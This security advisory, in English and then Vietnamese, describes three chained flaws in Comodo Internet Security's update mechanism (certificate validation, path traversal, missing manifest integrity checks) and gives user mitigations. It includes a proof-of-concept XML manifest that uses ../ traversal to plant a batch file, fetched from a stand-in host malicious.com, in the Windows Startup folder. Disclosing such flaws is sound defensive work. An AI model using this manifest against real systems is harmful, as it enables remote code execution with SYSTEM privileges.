Security researchers have uncovered a series of critical vulnerabilities in Comodo Internet Security 2025, exposing users to remote code execution (RCE) attacks that could grant threat actors SYSTEM-level privileges. These flaws affect Comodo Internet Security Premium version 12.3.4.8162 and potentially other recent releases, putting both individual and enterprise users at risk.
Kẽ hở Xác thực Chứng chỉ Không đúng cách (CWE-295)
Cơ chế cập nhật của Comodo dựa vào HTTPS để lấy các bản cập nhật từ máy chủ chính thức. Tuy nhiên, cơ chế này không xác thực các chứng chỉ SSL một cách đúng đắn. Điều này phá vỡ mô hình tin cậy cơ bản của các kênh cập nhật an toàn, cho phép kẻ tấn công thực hiện các cuộc tấn công DNS spoofing hoặc man-in-the-middle (MITM).
Kẻ tấn công có thể triển khai một máy chủ giả mạo, giả mạo chứng chỉ SSL để mạo danh máy chủ cập nhật hợp pháp của Comodo. Do Comodo không kiểm tra tính hợp lệ của chứng chỉ, nó sẽ tin tưởng kết nối này. Bằng cách chuyển hướng lưu lượng cập nhật đến máy chủ độc hại này, đối tượng tấn công có thể phân phối các tệp manifest cập nhật và tệp nhị phân (binaries) đã bị giả mạo mà không bị phát hiện. Thông qua phương thức này, bất kỳ tệp cập nhật nào được gửi đến người dùng đều có thể bị thay thế bằng phiên bản độc hại, được thiết kế để cài đặt phần mềm độc hại hoặc sửa đổi hành vi của ứng dụng bảo mật.
Lỗ hổng Khai thác Đường dẫn (CWE-22)
Một kẽ hở nghiêm trọng được phát hiện trong thành phần File Name Handler của Comodo Internet Security, cho phép khai thác đường dẫn (path traversal) thông qua việc thao túng các đối số tệp và thư mục. Cụ thể, khi Comodo xử lý thông tin về tệp và thư mục trong quá trình cập nhật, thành phần này không xác thực hoặc khử trùng (sanitize) đầy đủ các ký tự đường dẫn đặc biệt như ../. Điều này cho phép kẻ tấn công “thoát” khỏi thư mục cài đặt dự kiến của ứng dụng.
Minh họa Kỹ thuật Khai thác
Các tệp manifest cập nhật độc hại có thể chỉ định đường dẫn tệp nằm ngoài thư mục dự định của Comodo, cho phép ghi tệp tùy ý ở bất cứ đâu trên hệ thống. Khả năng ghi tệp tùy ý vào các vị trí nhạy cảm như thư mục Windows Startup (ví dụ: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup hoặc thư mục tương tự của người dùng) là cực kỳ nguy hiểm. Bất kỳ tệp thực thi nào (như .exe, .bat, .ps1) được đặt tại đây sẽ tự động được khởi chạy khi hệ thống khởi động lại.
Đoạn mã manifest PoC (Proof-of-Concept) minh họa cách kẻ tấn công có thể sử dụng lỗ hổng này để ghi một tệp batch độc hại vào thư mục Startup:
<update>
<file name="../../../ProgramData/Microsoft/Windows/Start Menu/Programs/Startup/malicious.bat" url="http://malicious.com/payload.bat" />
</update>
Đoạn mã trên chỉ thị cho quá trình cập nhật của Comodo tải xuống một tệp có tên payload.bat từ máy chủ độc hại (http://malicious.com/) và ghi nó vào đường dẫn được chỉ định. Vì đường dẫn được thao túng bằng ../../../, tệp này sẽ được đặt vào thư mục Startup của Windows. Khi hệ thống khởi động lại, tệp batch này sẽ được thực thi với các đặc quyền SYSTEM, mang lại cho kẻ tấn công toàn quyền kiểm soát hệ thống mà không cần tương tác thêm với người dùng.
Xác minh Tính xác thực Dữ liệu Không đủ (CWE-345)
Comodo không thực thi các kiểm tra tính toàn vẹn hoặc tính xác thực đối với các tệp manifest cập nhật. Điểm cốt lõi của lỗ hổng này là Comodo không sử dụng các biện pháp mã hóa như chữ ký số (digital signatures) hoặc hàm băm (cryptographic hashes) để xác minh rằng các tệp manifest cập nhật đến từ nguồn đáng tin cậy và chưa bị thay đổi trong quá trình truyền tải.
Tệp manifest là một tệp cấu hình quan trọng, thường ở định dạng XML hoặc JSON, định nghĩa các thành phần cần được cập nhật, vị trí tải xuống và các lệnh thực thi sau cập nhật. Khi không có kiểm tra tính toàn vẹn, kẻ tấn công có thể tạo ra một tệp manifest giả mạo hoàn toàn.
Tệp manifest độc hại này có thể chứa các lệnh để tải xuống và thực thi bất kỳ mã độc nào, chẳng hạn như một script PowerShell được lưu trữ trên máy chủ của kẻ tấn công. Vì quá trình cập nhật Comodo thường chạy với các đặc quyền cao nhất (SYSTEM) để thực hiện các thay đổi cấp hệ thống, payload độc hại cũng sẽ được thực thi với cùng mức độ đặc quyền này. Điều này cho phép kẻ tấn công bỏ qua các biện pháp bảo mật của hệ điều hành như Kiểm soát Tài khoản Người dùng (User Account Control – UAC) và thực hiện các hành vi độc hại như cài đặt backdoor, đánh cắp dữ liệu, hoặc triển khai ransomware mà không cần tương tác với người dùng. Mã độc lợi dụng chính các tiến trình đáng tin cậy của Comodo để thực thi, làm cho việc phát hiện và ngăn chặn trở nên khó khăn hơn.
Chuỗi Tấn công Tổng hợp
Các lỗ hổng CWE-295, CWE-22 và CWE-345 không chỉ là các điểm yếu riêng lẻ mà còn có thể được xâu chuỗi lại để tạo ra một kịch bản tấn công toàn diện và nguy hiểm, cho phép thực thi mã từ xa với đặc quyền SYSTEM. Kịch bản điển hình bao gồm các bước sau:
- 1. Đánh lừa kênh cập nhật (CWE-295): Kẻ tấn công thực hiện cuộc tấn công DNS spoofing hoặc MITM để chuyển hướng yêu cầu cập nhật của Comodo từ máy chủ hợp pháp sang máy chủ độc hại của chúng. Do thiếu xác thực chứng chỉ, Comodo chấp nhận kết nối này mà không cảnh báo, tin tưởng vào nguồn cung cấp dữ liệu giả mạo.
- 2. Phân phối manifest độc hại (CWE-345): Kẻ tấn công phân phối một tệp manifest cập nhật giả mạo thông qua máy chủ độc hại. Tệp manifest này không được kiểm tra tính toàn vẹn hoặc tính xác thực, cho phép kẻ tấn công tùy ý định nghĩa nội dung cập nhật và các lệnh thực thi.
- 3. Ghi mã độc vào hệ thống (CWE-22): Trong tệp manifest độc hại, kẻ tấn công sử dụng lỗ hổng path traversal để chỉ định một đường dẫn ghi tệp nằm ngoài thư mục cài đặt mặc định của Comodo. Ví dụ, ghi một tệp batch hoặc script PowerShell độc hại vào thư mục khởi động của Windows, hoặc vào một vị trí quan trọng khác của hệ thống.
- 4. Thực thi mã với quyền SYSTEM: Khi hệ thống khởi động lại (hoặc ngay lập tức nếu manifest kích hoạt trực tiếp một lệnh thực thi), mã độc được ghi vào sẽ tự động chạy. Quan trọng hơn, mã độc này được thực thi với các đặc quyền cao nhất (SYSTEM) thông qua một tiến trình đáng tin cậy của Comodo. Điều này cho phép kẻ tấn công thực hiện bất kỳ hành động nào trên hệ thống bị ảnh hưởng, bao gồm duy trì quyền truy cập, cài đặt phần mềm độc hại bổ sung, hoặc đánh cắp dữ liệu.
Chuỗi tấn công này đặc biệt nguy hiểm vì nó lợi dụng chính cơ chế cập nhật của phần mềm bảo mật, vốn được người dùng tin tưởng, để cài đặt và thực thi mã độc một cách âm thầm và hiệu quả mà không cần sự tương tác hay cho phép từ người dùng.
Tác động Tổng thể và Biện pháp Giảm thiểu
Các lỗ hổng được phát hiện nêu bật tầm quan trọng tối đa của việc xác thực chứng chỉ mạnh mẽ, khử trùng đường dẫn nghiêm ngặt (strict path sanitization) và kiểm tra tính toàn vẹn của manifest trong bất kỳ phần mềm bảo mật nào. Thiếu sót trong các lĩnh vực này có thể biến chính công cụ bảo vệ thành một điểm yếu nghiêm trọng.
Cho đến khi các bản vá được xác nhận và phát hành chính thức từ nhà cung cấp (Comodo), người dùng nên thực hiện các bước ngay lập tức để giảm thiểu rủi ro tiếp xúc. Các biện pháp phòng ngừa này bao gồm:
- Vô hiệu hóa Cập nhật Tự động: Nếu Comodo Internet Security cung cấp tùy chọn này, hãy vô hiệu hóa tính năng cập nhật tự động. Thay vào đó, hãy kiểm tra và tải xuống các bản cập nhật thủ công từ trang web chính thức của Comodo sau khi có thông báo về bản vá. Điều này giúp đảm bảo rằng bạn chỉ cài đặt các bản cập nhật đã được xác minh và an toàn.
- Hạn chế Kết nối Mạng Không Tin cậy: Tránh sử dụng Comodo Internet Security hoặc thực hiện các hoạt động nhạy cảm trên các mạng Wi-Fi công cộng hoặc không đáng tin cậy, nơi nguy cơ tấn công MITM và DNS spoofing cao hơn đáng kể. Ưu tiên sử dụng mạng riêng tư an toàn hoặc kết nối VPN tin cậy để bảo vệ lưu lượng truy cập của bạn.
- Giám sát Hoạt động Bất thường: Thường xuyên kiểm tra các tiến trình đang chạy trên hệ thống, các tệp mới được tạo hoặc sửa đổi trong các thư mục hệ thống quan trọng (như thư mục Startup, thư mục tạm thời, thư mục cài đặt phần mềm), và lưu lượng mạng bất thường. Sử dụng các công cụ giám sát hệ thống hoặc các giải pháp Endpoint Detection and Response (EDR) nếu có thể để phát hiện sớm các dấu hiệu khai thác.
- Sao lưu Dữ liệu Quan trọng: Thực hiện sao lưu định kỳ và ngoại tuyến các dữ liệu quan trọng của bạn. Điều này giúp giảm thiểu thiệt hại trong trường hợp hệ thống bị xâm nhập thành công và dữ liệu bị mã hóa bởi ransomware hoặc bị xóa.
- Cập nhật Thông tin từ Nhà cung cấp: Theo dõi chặt chẽ các kênh thông tin chính thức của Comodo để nhận được thông báo về các bản vá bảo mật, khuyến nghị và hướng dẫn cụ thể từ nhà cung cấp. Chỉ tin tưởng thông tin từ các nguồn chính thống.
